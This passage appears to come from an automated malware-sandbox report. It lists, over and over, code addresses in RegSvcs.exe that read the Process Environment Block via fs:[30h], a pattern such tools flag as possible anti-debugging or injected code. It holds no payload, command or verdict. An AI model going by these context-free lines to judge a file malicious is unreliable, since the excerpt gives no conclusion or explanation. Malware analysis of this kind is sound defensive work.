                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02A0 mov eax, dword ptr fs:[00000030h]10_2_016A02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov ecx, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017262A0 mov eax, dword ptr fs:[00000030h]10_2_017262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE284 mov eax, dword ptr fs:[00000030h]10_2_016CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE284 mov eax, dword ptr fs:[00000030h]10_2_016CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710283 mov eax, dword ptr fs:[00000030h]10_2_01710283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C656A mov eax, dword ptr fs:[00000030h]10_2_016C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698550 mov eax, dword ptr fs:[00000030h]10_2_01698550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698550 mov eax, dword ptr fs:[00000030h]10_2_01698550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE53E mov eax, dword ptr fs:[00000030h]10_2_016BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0535 mov eax, dword ptr fs:[00000030h]10_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726500 mov eax, dword ptr fs:[00000030h]10_2_01726500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764500 mov eax, dword ptr fs:[00000030h]10_2_01764500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC5ED mov eax, dword ptr fs:[00000030h]10_2_016CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC5ED mov eax, dword ptr fs:[00000030h]10_2_016CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016925E0 mov eax, dword ptr fs:[00000030h]10_2_016925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BE5E7 mov eax, dword ptr fs:[00000030h]10_2_016BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE5CF mov eax, dword ptr fs:[00000030h]10_2_016CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE5CF mov eax, dword ptr fs:[00000030h]10_2_016CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016965D0 mov eax, dword ptr fs:[00000030h]10_2_016965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA5D0 mov eax, dword ptr fs:[00000030h]10_2_016CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA5D0 mov eax, dword ptr fs:[00000030h]10_2_016CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017105A7 mov eax, dword ptr fs:[00000030h]10_2_017105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B45B1 mov eax, dword ptr fs:[00000030h]10_2_016B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B45B1 mov eax, dword ptr fs:[00000030h]10_2_016B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C4588 mov eax, dword ptr fs:[00000030h]10_2_016C4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692582 mov eax, dword ptr fs:[00000030h]10_2_01692582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692582 mov ecx, dword ptr fs:[00000030h]10_2_01692582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE59C mov eax, dword ptr fs:[00000030h]10_2_016CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C460 mov ecx, dword ptr fs:[00000030h]10_2_0171C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BA470 mov eax, dword ptr fs:[00000030h]10_2_016BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A456 mov eax, dword ptr fs:[00000030h]10_2_0174A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE443 mov eax, dword ptr fs:[00000030h]10_2_016CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B245A mov eax, dword ptr fs:[00000030h]10_2_016B245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168645D mov eax, dword ptr fs:[00000030h]10_2_0168645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E420 mov eax, dword ptr fs:[00000030h]10_2_0168E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C427 mov eax, dword ptr fs:[00000030h]10_2_0168C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716420 mov eax, dword ptr fs:[00000030h]10_2_01716420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA430 mov eax, dword ptr fs:[00000030h]10_2_016CA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C8402 mov eax, dword ptr fs:[00000030h]10_2_016C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C8402 mov eax, dword ptr fs:[00000030h]10_2_016C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C8402 mov eax, dword ptr fs:[00000030h]10_2_016C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016904E5 mov ecx, dword ptr fs:[00000030h]10_2_016904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171A4B0 mov eax, dword ptr fs:[00000030h]10_2_0171A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016964AB mov eax, dword ptr fs:[00000030h]10_2_016964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C44B0 mov ecx, dword ptr fs:[00000030h]10_2_016C44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A49A mov eax, dword ptr fs:[00000030h]10_2_0174A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01698770 mov eax, dword ptr fs:[00000030h]10_2_01698770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0770 mov eax, dword ptr fs:[00000030h]10_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C674D mov esi, dword ptr fs:[00000030h]10_2_016C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C674D mov eax, dword ptr fs:[00000030h]10_2_016C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C674D mov eax, dword ptr fs:[00000030h]10_2_016C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01714755 mov eax, dword ptr fs:[00000030h]10_2_01714755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171E75D mov eax, dword ptr fs:[00000030h]10_2_0171E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690750 mov eax, dword ptr fs:[00000030h]10_2_01690750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2750 mov eax, dword ptr fs:[00000030h]10_2_016D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2750 mov eax, dword ptr fs:[00000030h]10_2_016D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170C730 mov eax, dword ptr fs:[00000030h]10_2_0170C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC720 mov eax, dword ptr fs:[00000030h]10_2_016CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC720 mov eax, dword ptr fs:[00000030h]10_2_016CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C273C mov eax, dword ptr fs:[00000030h]10_2_016C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C273C mov ecx, dword ptr fs:[00000030h]10_2_016C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C273C mov eax, dword ptr fs:[00000030h]10_2_016C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC700 mov eax, dword ptr fs:[00000030h]10_2_016CC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690710 mov eax, dword ptr fs:[00000030h]10_2_01690710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C0710 mov eax, dword ptr fs:[00000030h]10_2_016C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B27ED mov eax, dword ptr fs:[00000030h]10_2_016B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B27ED mov eax, dword ptr fs:[00000030h]10_2_016B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B27ED mov eax, dword ptr fs:[00000030h]10_2_016B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171E7E1 mov eax, dword ptr fs:[00000030h]10_2_0171E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016947FB mov eax, dword ptr fs:[00000030h]10_2_016947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016947FB mov eax, dword ptr fs:[00000030h]10_2_016947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169C7C0 mov eax, dword ptr fs:[00000030h]10_2_0169C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017107C3 mov eax, dword ptr fs:[00000030h]10_2_017107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016907AF mov eax, dword ptr fs:[00000030h]10_2_016907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017447A0 mov eax, dword ptr fs:[00000030h]10_2_017447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173678E mov eax, dword ptr fs:[00000030h]10_2_0173678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA660 mov eax, dword ptr fs:[00000030h]10_2_016CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA660 mov eax, dword ptr fs:[00000030h]10_2_016CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C2674 mov eax, dword ptr fs:[00000030h]10_2_016C2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175866E mov eax, dword ptr fs:[00000030h]10_2_0175866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175866E mov eax, dword ptr fs:[00000030h]10_2_0175866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AC640 mov eax, dword ptr fs:[00000030h]10_2_016AC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169262C mov eax, dword ptr fs:[00000030h]10_2_0169262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C6620 mov eax, dword ptr fs:[00000030h]10_2_016C6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C8620 mov eax, dword ptr fs:[00000030h]10_2_016C8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE627 mov eax, dword ptr fs:[00000030h]10_2_016AE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A260B mov eax, dword ptr fs:[00000030h]10_2_016A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2619 mov eax, dword ptr fs:[00000030h]10_2_016D2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E609 mov eax, dword ptr fs:[00000030h]10_2_0170E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017106F1 mov eax, dword ptr fs:[00000030h]10_2_017106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017106F1 mov eax, dword ptr fs:[00000030h]10_2_017106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E6F2 mov eax, dword ptr fs:[00000030h]10_2_0170E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E6F2 mov eax, dword ptr fs:[00000030h]10_2_0170E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E6F2 mov eax, dword ptr fs:[00000030h]10_2_0170E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E6F2 mov eax, dword ptr fs:[00000030h]10_2_0170E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA6C7 mov ebx, dword ptr fs:[00000030h]10_2_016CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA6C7 mov eax, dword ptr fs:[00000030h]10_2_016CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CC6A6 mov eax, dword ptr fs:[00000030h]10_2_016CC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C66B0 mov eax, dword ptr fs:[00000030h]10_2_016C66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694690 mov eax, dword ptr fs:[00000030h]10_2_01694690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694690 mov eax, dword ptr fs:[00000030h]10_2_01694690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D096E mov eax, dword ptr fs:[00000030h]10_2_016D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D096E mov edx, dword ptr fs:[00000030h]10_2_016D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D096E mov eax, dword ptr fs:[00000030h]10_2_016D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B6962 mov eax, dword ptr fs:[00000030h]10_2_016B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B6962 mov eax, dword ptr fs:[00000030h]10_2_016B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B6962 mov eax, dword ptr fs:[00000030h]10_2_016B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01734978 mov eax, dword ptr fs:[00000030h]10_2_01734978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01734978 mov eax, dword ptr fs:[00000030h]10_2_01734978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171C97C mov eax, dword ptr fs:[00000030h]10_2_0171C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01764940 mov eax, dword ptr fs:[00000030h]10_2_01764940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01710946 mov eax, dword ptr fs:[00000030h]10_2_01710946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0172892B mov eax, dword ptr fs:[00000030h]10_2_0172892B
